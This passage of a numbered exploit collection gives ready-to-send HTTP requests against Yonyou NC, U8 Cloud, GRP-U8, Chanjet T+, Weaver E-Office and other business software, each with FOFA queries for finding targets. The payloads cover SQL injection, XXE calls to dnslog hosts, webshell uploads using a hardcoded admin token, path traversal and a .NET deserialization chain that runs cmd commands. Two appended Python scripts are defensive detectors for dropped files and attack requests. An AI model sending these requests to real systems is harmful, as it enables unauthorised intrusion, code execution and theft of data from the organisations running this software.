GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Note on entries 26 to 34: the NC injection points are shown with either an MSSQL delay (waitfor delay '0:0:5') or an Oracle delay (DBMS_PIPE.RECEIVE_MESSAGE(...,5)). Which one fires depends on the database behind the particular NC deployment, not on the endpoint, so a target that stays quick with one dialect should be retested with the other before it is marked clean.

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

Two things to note when checking a host. The accessToken is a literal HS512 JWT carried by the POC rather than anything obtained from the target; its payload decodes to {"pk_group":"00016A10000000000JB6","datasource":"1","langCode":"zh","userType":"1","userid":"1","userCode":"admin"}, so the request is accepted as the admin user. The filename is used as a relative write path, which is what places the JSP under webapps/nc_web; a GET to /1.jsp that returns 1234321 confirms the write.

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

The entity reference is sent as %26xxe1two%3b so that it survives form decoding as &xxe1two;; the formatted SOAP returned in the response should contain the contents of win.ini in place of the reference.

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>

The string argument inside the CDATA section is parsed as XML again by the service. %ccc; and %ddd; are not declared inline; they are meant to come from the external DTD fetched from the attacker host, so for a pure DNS check the %aaa; reference alone is enough and the two extra references can be dropped.

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

This is an error-based check for SQL Server: the hex string of MD5('123456') cannot be converted to an integer for the comparison, so the conversion error in the response carries e10adc3949ba59abbe56e057f20f883e.

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

The uploaded file is then retrieved at:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

The POC only demonstrates the delay. The ';' before waitfor shows that stacked queries are accepted, which on SQL Server is what makes further statements, and hence the RCE in the title, possible.

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

Note the DontCheckLogin=1 query parameter, which is what lets the unauthenticated request reach the upload handler; entry 49 relies on the same switch.

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

%s in the filename is a placeholder for any name; the trailing space after .php is part of the POC as published. The file is stored under /tmpfile/ with a name of the form updXXXX.tmp.php, for example:
http://x.x.x.x/tmpfile/updB3CB.tmp.php
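Entries 24, 28, 35, 42, 48 and 49 all end with a script file written somewhere under the application's web root. The Python script below is an added example for the host-side check, not code from the original post or from Yonyou: it walks a web root and reports script files that carry a marker-echo or shell idiom, or that combine two of the weaker signals (recent modification, one of the upload locations named in those entries, a name of the kind entry 49 produces). The directory list and name pattern are taken from the POCs above; the sample web root is constructed inside a temporary directory so the example runs offline, and the 30-day window is an assumption to tune per site.

```python
"""Sweep a web root for files left behind by the upload POCs in this section (added example)."""
import os
import re
import tempfile
import time
from pathlib import Path
from typing import List, Optional, Tuple

SCRIPT_SUFFIXES = {".jsp", ".jspx", ".php", ".phtml", ".aspx", ".ashx"}

# Directories (relative to the web root) that the upload POCs above write into.
UPLOAD_DIRS = ("webapps/nc_web", "uapim/static/pages", "tmpfile", "u8qx")

# Idioms seen in the POC bodies plus the usual one-line shell primitives.
SUSPICIOUS_CONTENT = re.compile(
    rb"out\.println\(|Runtime\.getRuntime\(\)|Process\.Start\(|\beval\s*\("
    rb"|\bsystem\s*\(|passthru\s*\(|shell_exec\s*\(|\$_(?:GET|POST|REQUEST)\[", re.I)

# Server-generated name from entry 49 (updXXXX.tmp.php) and hidden dotfiles.
ODD_NAME = re.compile(r"^\.|^upd[0-9a-f]{4}\.tmp\.php$", re.I)


def scan_webroot(root: str, newer_than_days: int = 30,
                 now: Optional[float] = None) -> List[Tuple[str, List[str]]]:
    """Return (relative path, reasons) for script files worth a look.

    A file is reported when it shows suspicious content, or when at least two of the
    weaker signals (recent mtime, upload directory, odd name) coincide, so a long-lived
    legitimate JSP sitting in an upload directory is not reported on its own.
    """
    base = Path(root)
    cutoff = (now if now is not None else time.time()) - newer_than_days * 86400
    findings: List[Tuple[str, List[str]]] = []
    for p in sorted(base.rglob("*")):
        if not p.is_file() or p.suffix.lower() not in SCRIPT_SUFFIXES:
            continue
        rel = p.relative_to(base).as_posix()
        reasons: List[str] = []
        if p.stat().st_mtime >= cutoff:
            reasons.append("recently_modified")
        if any(rel.startswith(d + "/") for d in UPLOAD_DIRS):
            reasons.append("in_upload_dir")
        if ODD_NAME.search(p.name):
            reasons.append("odd_name")
        with p.open("rb") as fh:
            if SUSPICIOUS_CONTENT.search(fh.read(65536)):   # 64 KiB covers a one-line shell
                reasons.append("suspicious_content")
        if "suspicious_content" in reasons or len(reasons) >= 2:
            findings.append((rel, reasons))
    return findings


def build_sample_webroot(root: str) -> None:
    """Constructed web root: two files as the POCs of entries 35 and 49 would leave them,
    and one old, legitimate JSP in the same directory that must not be reported."""
    files = {
        "webapps/nc_web/1.jsp": b"<%out.println(1111*1111);%>",
        "tmpfile/updB3CB.tmp.php": b"wersqqmlumloqa",
        "webapps/nc_web/login.jsp": b"<html><body>login form</body></html>",
    }
    for rel, content in files.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(content)
    old = time.time() - 400 * 86400          # well outside the 30-day window
    os.utime(Path(root, "webapps/nc_web/login.jsp"), (old, old))


def demo() -> List[Tuple[str, List[str]]]:
    """Build the constructed web root in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        return scan_webroot(tmp)


if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, reasons)
```

On a real host run scan_webroot against the product's web root (for NC the directory that contains webapps/nc_web) and treat anything with suspicious_content as an incident, the two-signal hits as a review list.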

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

Error-based MySQL injection in searchdata[1][searchfield]: the response carries an XPATH syntax error whose text starts with ^e10adc3949ba59abbe56e057f20f883 (MySQL limits the extractvalue error text to 32 characters, so the final hex digit of the hash is cut off).

51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

The union is confirmed when the response contains the MD5 of 102103122. The /*!50000...*/ wrappers are MySQL version-conditional comments, used here to get union and select past simple keyword filters.

53. DPTech (迪普) VPN Service path traversal file read
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Only the path is given in the source; the %2F-encoded ../ sequences traverse to /etc/passwd, so this is a file read rather than an upload.

54. Chanjet (畅捷通) T+ GetStoreWarehouseByStore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below. The JSON is deserialized into a System.Windows.Data.ObjectDataProvider that calls Process.Start, which runs the command and writes a marker string to a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the URL below; the marker string in the response confirms that the command ran in the tplus web directory:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet (畅捷通) T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: send that Cookie with a request to
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet (畅捷通) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

Same ObjectDataProvider chain as entry 54 on a different AjaxPro handler; a DNS lookup of the dnslog name from the target is the confirmation here.
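Almost every request in this section carries a string that does not occur in ordinary traffic: the waitfor delay / DBMS_PIPE.RECEIVE_MESSAGE stalls (entries 26 to 34, 41, 43, 44, 46, 51), the error-based and union probes (39, 50, 52, 57, 58, 60), the inline DOCTYPE/ENTITY of the XXE entries (36 to 38, 40, 45), the fastjson "@type" probe at the top of this section, the ObjectDataProvider "__type" gadget of entries 54 and 56, the ldap:// target of entry 25, the traversal of 47 and 53, the DontCheckLogin=1 switch of 48 and 49, and the ||echo command injection of 62. The script below is an added example, not code from the original post or from any of the vendors, that normalises a request (URL-decoding twice, and base64-decoding long parameter values, which is how entry 60 hides its SQL) and tags it with the indicator classes it matches. The (method, path, body) record format and the sample records, which are built from the POCs on this page, are constructed for the example; the loader is the part to adapt to a real access or WAF log.

```python
"""Indicator tagging for the request patterns used by the POCs in this section (added example)."""
import base64
import binascii
import re
import urllib.parse
from typing import Iterable, List, Tuple

# Each indicator is matched against the fully decoded, lower-cased request text.
INDICATORS = {
    "sqli_time_based": re.compile(r"waitfor\s+delay\s+'|dbms_pipe\.receive_message\s*\("),
    "sqli_error_or_union": re.compile(
        r"extractvalue\s*\(|hashbytes\s*\(|fn_sqlvarbasetostr|fn_varbintohexstr"
        r"|@@version|\buser\s*\(\s*\)|/\*!\d{5}union|\bunion\s+select\b"),
    "xxe": re.compile(r"<!doctype\s|<!entity\s"),
    "fastjson_autotype": re.compile(r'"@type"\s*:\s*"'),
    "dotnet_objectdataprovider": re.compile(r'"__type"\s*:\s*"system\.windows\.data\.objectdataprovider'),
    "jndi_lookup": re.compile(r"\b(?:ldap|ldaps|rmi)://"),
    "path_traversal": re.compile(r"\.\./|\.\.\\"),
    "auth_bypass_param": re.compile(r"(?:^|[?&])dontchecklogin=1\b", re.M),
    "command_injection": re.compile(r"\|\|\s*(?:echo|ping|curl|wget)\b"),
}

# Long, purely base64-looking parameter values are decoded and scanned as well;
# the 20-character floor keeps ordinary words such as "exportexcelbysql" out.
B64_VALUE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decoded_views(path: str, body: str) -> str:
    """One lower-cased blob holding the raw, once- and twice-decoded request plus any
    base64-decoded parameter values, so indicators hidden by encoding still match."""
    raw = path + "\n" + body
    once = urllib.parse.unquote_plus(raw)
    twice = urllib.parse.unquote_plus(once)       # double-encoded traversal such as %252e%252e
    views = [raw, once, twice]
    query = path.partition("?")[2]
    for _, value in urllib.parse.parse_qsl(query + "&" + body, keep_blank_values=True):
        if B64_VALUE.fullmatch(value):
            try:
                views.append(base64.b64decode(value, validate=True).decode("utf-8", "replace"))
            except (binascii.Error, ValueError):
                pass                                # not really base64; ignore
    return "\n".join(views).lower()


def classify(path: str, body: str = "") -> List[str]:
    """Sorted indicator names matching the request; empty for an ordinary request."""
    text = decoded_views(path, body)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan(records: Iterable[Tuple[str, str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Tag each (method, path, body) record; only records with an indicator are returned."""
    hits = []
    for method, path, body in records:
        tags = classify(path, body)
        if tags:
            hits.append((method, path, tags))
    return hits


# Constructed sample records, built from request lines and bodies shown in this section
# (placeholders such as DNSLOG kept as they appear there). The last record is benign.
SAMPLE_REQUESTS = [
    ("GET", "/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'--", ""),
    ("GET", "/ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)--", ""),
    ("POST", "/uapws/soapFormat.ajax",
     'msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope/>'),
    ("POST", "/evo-runs/v1.0/auths/sysusers/random",
     '{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://DNSLOG"}}""}'),
    ("POST", "/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore",
     '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, '
     'Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start"}}'),
    ("POST", "/portal/registerServlet", "type=1&dsname=ldap://dnslog"),
    ("GET", "/ma/emp/maEmp/download?fileName=../../../etc/passwd", ""),
    ("GET", "/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", ""),
    ("POST", "/ajax/swfupload.php?DontCheckLogin=1&vname=file", ""),
    ("GET", "/importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql", ""),
    ("GET", '/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true'
            '&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt', ""),
    ("GET", "/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1001", ""),
]

if __name__ == "__main__":
    for method, path, tags in scan(SAMPLE_REQUESTS):
        print(method, path[:60], tags)
```

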